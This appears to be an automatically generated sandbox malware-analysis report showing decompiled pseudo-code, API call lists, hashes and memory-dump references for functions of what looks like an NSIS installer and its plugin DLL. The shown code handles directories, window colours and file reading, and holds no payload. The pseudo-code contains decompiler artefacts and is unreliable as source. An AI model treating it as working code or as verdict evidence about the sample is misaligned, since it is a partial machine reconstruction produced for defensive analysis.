                                                                                                                                                                                                                            0x00406740
                                                                                                                                                                                                                            0x0040674c
                                                                                                                                                                                                                            0x0040674f
                                                                                                                                                                                                                            0x00406752
                                                                                                                                                                                                                            0x00406753
                                                                                                                                                                                                                            0x00406758
                                                                                                                                                                                                                            0x0040675e
                                                                                                                                                                                                                            0x00406761
                                                                                                                                                                                                                            0x00406764
                                                                                                                                                                                                                            0x00406857
                                                                                                                                                                                                                            0x0040685c
                                                                                                                                                                                                                            0x0040688f
                                                                                                                                                                                                                            0x00406894
                                                                                                                                                                                                                            0x00406899
                                                                                                                                                                                                                            0x0040689e
                                                                                                                                                                                                                            0x0040689e
                                                                                                                                                                                                                            0x004068a3
                                                                                                                                                                                                                            0x004068a9
                                                                                                                                                                                                                            0x004068ac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004068ac
                                                                                                                                                                                                                            0x0040685e
                                                                                                                                                                                                                            0x00406861
                                                                                                                                                                                                                            0x00406864
                                                                                                                                                                                                                            0x00406879
                                                                                                                                                                                                                            0x00406880
                                                                                                                                                                                                                            0x00406866
                                                                                                                                                                                                                            0x0040686d
                                                                                                                                                                                                                            0x0040686d
                                                                                                                                                                                                                            0x00406888
                                                                                                                                                                                                                            0x0040688b
                                                                                                                                                                                                                            0x0040684f
                                                                                                                                                                                                                            0x00406850
                                                                                                                                                                                                                            0x00406850
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040688b
                                                                                                                                                                                                                            0x00406771
                                                                                                                                                                                                                            0x00406775
                                                                                                                                                                                                                            0x00406775
                                                                                                                                                                                                                            0x00406776
                                                                                                                                                                                                                            0x00406778
                                                                                                                                                                                                                            0x004067b5
                                                                                                                                                                                                                            0x004067b8
                                                                                                                                                                                                                            0x004067c8
                                                                                                                                                                                                                            0x004067cb
                                                                                                                                                                                                                            0x004067d3
                                                                                                                                                                                                                            0x004067d9
                                                                                                                                                                                                                            0x004067d9
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x00406836
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004067dd
                                                                                                                                                                                                                            0x004067e2
                                                                                                                                                                                                                            0x004067e3
                                                                                                                                                                                                                            0x004067e5
                                                                                                                                                                                                                            0x004067fc
                                                                                                                                                                                                                            0x0040680a
                                                                                                                                                                                                                            0x00406810
                                                                                                                                                                                                                            0x00406812
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406818
                                                                                                                                                                                                                            0x00406821
                                                                                                                                                                                                                            0x00406824
                                                                                                                                                                                                                            0x0040682a
                                                                                                                                                                                                                            0x0040682e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040682e
                                                                                                                                                                                                                            0x004067f6
                                                                                                                                                                                                                            0x004067f8
                                                                                                                                                                                                                            0x004067fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004067fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x004067c0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040677a
                                                                                                                                                                                                                            0x00406798
                                                                                                                                                                                                                            0x004067a1
                                                                                                                                                                                                                            0x0040683e
                                                                                                                                                                                                                            0x00406842
                                                                                                                                                                                                                            0x0040684a
                                                                                                                                                                                                                            0x0040684a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406842
                                                                                                                                                                                                                            0x004067ab
                                                                                                                                                                                                                            0x00406838
                                                                                                                                                                                                                            0x0040683c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040683c
                                                                                                                                                                                                                            0x00406778
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406705

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                            • API String ID: 4260037668-301486440
                                                                                                                                                                                                                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                                                                                                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E2655 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E687E2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E687E12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M687E2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x687e407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x687e409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E687E1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x687e506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x687e506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x687e506c);
								goto L17;
							case 5:
								_push( *0x687e506c);
								_push(__edi);
								_push( *__eax);
								" {\'t@u\'t"();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x687e5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E687E1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E687E1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                                                                                                                                                            0x687e265f
                                                                                                                                                                                                                            0x687e2661
                                                                                                                                                                                                                            0x687e2665
                                                                                                                                                                                                                            0x687e2674
                                                                                                                                                                                                                            0x687e2678
                                                                                                                                                                                                                            0x687e267d
                                                                                                                                                                                                                            0x687e267d
                                                                                                                                                                                                                            0x687e2685
                                                                                                                                                                                                                            0x687e268c
                                                                                                                                                                                                                            0x687e2692
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2699
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e26a1
                                                                                                                                                                                                                            0x687e26a5
                                                                                                                                                                                                                            0x687e26a8
                                                                                                                                                                                                                            0x687e26ac
                                                                                                                                                                                                                            0x687e26b3
                                                                                                                                                                                                                            0x687e26b7
                                                                                                                                                                                                                            0x687e26bd
                                                                                                                                                                                                                            0x687e26bf
                                                                                                                                                                                                                            0x687e26c1
                                                                                                                                                                                                                            0x687e26c1
                                                                                                                                                                                                                            0x687e26c8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e26d1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e26d8
                                                                                                                                                                                                                            0x687e26de
                                                                                                                                                                                                                            0x687e26e8
                                                                                                                                                                                                                            0x687e26ee
                                                                                                                                                                                                                            0x687e26f3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2714
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e26fa
                                                                                                                                                                                                                            0x687e2700
                                                                                                                                                                                                                            0x687e2701
                                                                                                                                                                                                                            0x687e2703
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e271c
                                                                                                                                                                                                                            0x687e271e
                                                                                                                                                                                                                            0x687e2724
                                                                                                                                                                                                                            0x687e272a
                                                                                                                                                                                                                            0x687e272a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2692
                                                                                                                                                                                                                            0x687e272d
                                                                                                                                                                                                                            0x687e272d
                                                                                                                                                                                                                            0x687e2732
                                                                                                                                                                                                                            0x687e2743
                                                                                                                                                                                                                            0x687e2743
                                                                                                                                                                                                                            0x687e2749
                                                                                                                                                                                                                            0x687e274e
                                                                                                                                                                                                                            0x687e2753
                                                                                                                                                                                                                            0x687e275f
                                                                                                                                                                                                                            0x687e2764
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2769
                                                                                                                                                                                                                            0x687e2755
                                                                                                                                                                                                                            0x687e2756
                                                                                                                                                                                                                            0x687e276a
                                                                                                                                                                                                                            0x687e276a
                                                                                                                                                                                                                            0x687e2753
                                                                                                                                                                                                                            0x687e276b
                                                                                                                                                                                                                            0x687e276c
                                                                                                                                                                                                                            0x687e276f
                                                                                                                                                                                                                            0x687e2783

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E12BB: GlobalAlloc.KERNEL32(00000040,?,687E12DB,?,687E137F,00000019,687E11CA,-000000A0), ref: 687E12C5
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2743
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2778
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                                                            • String ID: {'t@u't
                                                                                                                                                                                                                            • API String ID: 1780285237-541310889
                                                                                                                                                                                                                            • Opcode ID: c44dd1ff84bb5579a0aa428c9a48f75f1a6f7958e6706cd9969b267ea74de860
                                                                                                                                                                                                                            • Instruction ID: bbdf88771f1fde4447d003fc7d50dc31932461ff56bf08a341af4ae5a831bae4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c44dd1ff84bb5579a0aa428c9a48f75f1a6f7958e6706cd9969b267ea74de860
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B319A71214506EBCB258F64DECCC2E7BB7FB8B3457984678F22187620C731A8059B71
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                                                                            0x0040463d
                                                                                                                                                                                                                            0x004046f3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004046f3
                                                                                                                                                                                                                            0x0040464e
                                                                                                                                                                                                                            0x00404652
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040466c
                                                                                                                                                                                                                            0x0040466c
                                                                                                                                                                                                                            0x00404675
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404677
                                                                                                                                                                                                                            0x00404683
                                                                                                                                                                                                                            0x00404686
                                                                                                                                                                                                                            0x00404686
                                                                                                                                                                                                                            0x0040468c
                                                                                                                                                                                                                            0x00404692
                                                                                                                                                                                                                            0x00404692
                                                                                                                                                                                                                            0x0040469e
                                                                                                                                                                                                                            0x004046a4
                                                                                                                                                                                                                            0x004046ab
                                                                                                                                                                                                                            0x004046ae
                                                                                                                                                                                                                            0x004046b1
                                                                                                                                                                                                                            0x004046b3
                                                                                                                                                                                                                            0x004046b3
                                                                                                                                                                                                                            0x004046bb
                                                                                                                                                                                                                            0x004046c1
                                                                                                                                                                                                                            0x004046c1
                                                                                                                                                                                                                            0x004046cb
                                                                                                                                                                                                                            0x004046d0
                                                                                                                                                                                                                            0x004046d3
                                                                                                                                                                                                                            0x004046d8
                                                                                                                                                                                                                            0x004046db
                                                                                                                                                                                                                            0x004046db
                                                                                                                                                                                                                            0x004046eb
                                                                                                                                                                                                                            0x004046eb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004046ee

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                                                                                                                            0x004026ec
                                                                                                                                                                                                                            0x004026ee
                                                                                                                                                                                                                            0x004026f1
                                                                                                                                                                                                                            0x004026f3
                                                                                                                                                                                                                            0x004026f6
                                                                                                                                                                                                                            0x004026fb
                                                                                                                                                                                                                            0x004026ff
                                                                                                                                                                                                                            0x00402702
                                                                                                                                                                                                                            0x00402705
                                                                                                                                                                                                                            0x00402c2a
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                                                            0x00402712
                                                                                                                                                                                                                            0x00402714
                                                                                                                                                                                                                            0x00402714
                                                                                                                                                                                                                            0x0040271a
                                                                                                                                                                                                                            0x0040287e
                                                                                                                                                                                                                            0x0040287e
                                                                                                                                                                                                                            0x00402881
                                                                                                                                                                                                                            0x00402886
                                                                                                                                                                                                                            0x004015b6
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402720
                                                                                                                                                                                                                            0x00402721
                                                                                                                                                                                                                            0x0040272c
                                                                                                                                                                                                                            0x0040272f
                                                                                                                                                                                                                            0x0040273b
                                                                                                                                                                                                                            0x0040273f
                                                                                                                                                                                                                            0x004027d7
                                                                                                                                                                                                                            0x004027ef
                                                                                                                                                                                                                            0x004027ff
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402745
                                                                                                                                                                                                                            0x00402745
                                                                                                                                                                                                                            0x00402748
                                                                                                                                                                                                                            0x00402749
                                                                                                                                                                                                                            0x0040274c
                                                                                                                                                                                                                            0x00402751
                                                                                                                                                                                                                            0x00402758
                                                                                                                                                                                                                            0x00402760
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402766
                                                                                                                                                                                                                            0x00402766
                                                                                                                                                                                                                            0x0040276b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402771
                                                                                                                                                                                                                            0x00402771
                                                                                                                                                                                                                            0x00402779
                                                                                                                                                                                                                            0x0040277c
                                                                                                                                                                                                                            0x0040277f
                                                                                                                                                                                                                            0x0040283a
                                                                                                                                                                                                                            0x00402841
                                                                                                                                                                                                                            0x00402785
                                                                                                                                                                                                                            0x0040278b
                                                                                                                                                                                                                            0x00402797
                                                                                                                                                                                                                            0x00402801
                                                                                                                                                                                                                            0x00402801
                                                                                                                                                                                                                            0x00402799
                                                                                                                                                                                                                            0x00402799
                                                                                                                                                                                                                            0x0040279c
                                                                                                                                                                                                                            0x0040279e
                                                                                                                                                                                                                            0x0040279e
                                                                                                                                                                                                                            0x0040279e
                                                                                                                                                                                                                            0x004027a1
                                                                                                                                                                                                                            0x004027a6
                                                                                                                                                                                                                            0x004027a9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004027ab
                                                                                                                                                                                                                            0x004027ae
                                                                                                                                                                                                                            0x004027bc
                                                                                                                                                                                                                            0x004027c2
                                                                                                                                                                                                                            0x004027d0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004027d2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004027d2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004027d0
                                                                                                                                                                                                                            0x0040279e
                                                                                                                                                                                                                            0x00402804
                                                                                                                                                                                                                            0x00402807
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402809
                                                                                                                                                                                                                            0x0040280e
                                                                                                                                                                                                                            0x0040284f
                                                                                                                                                                                                                            0x00402871
                                                                                                                                                                                                                            0x00402878
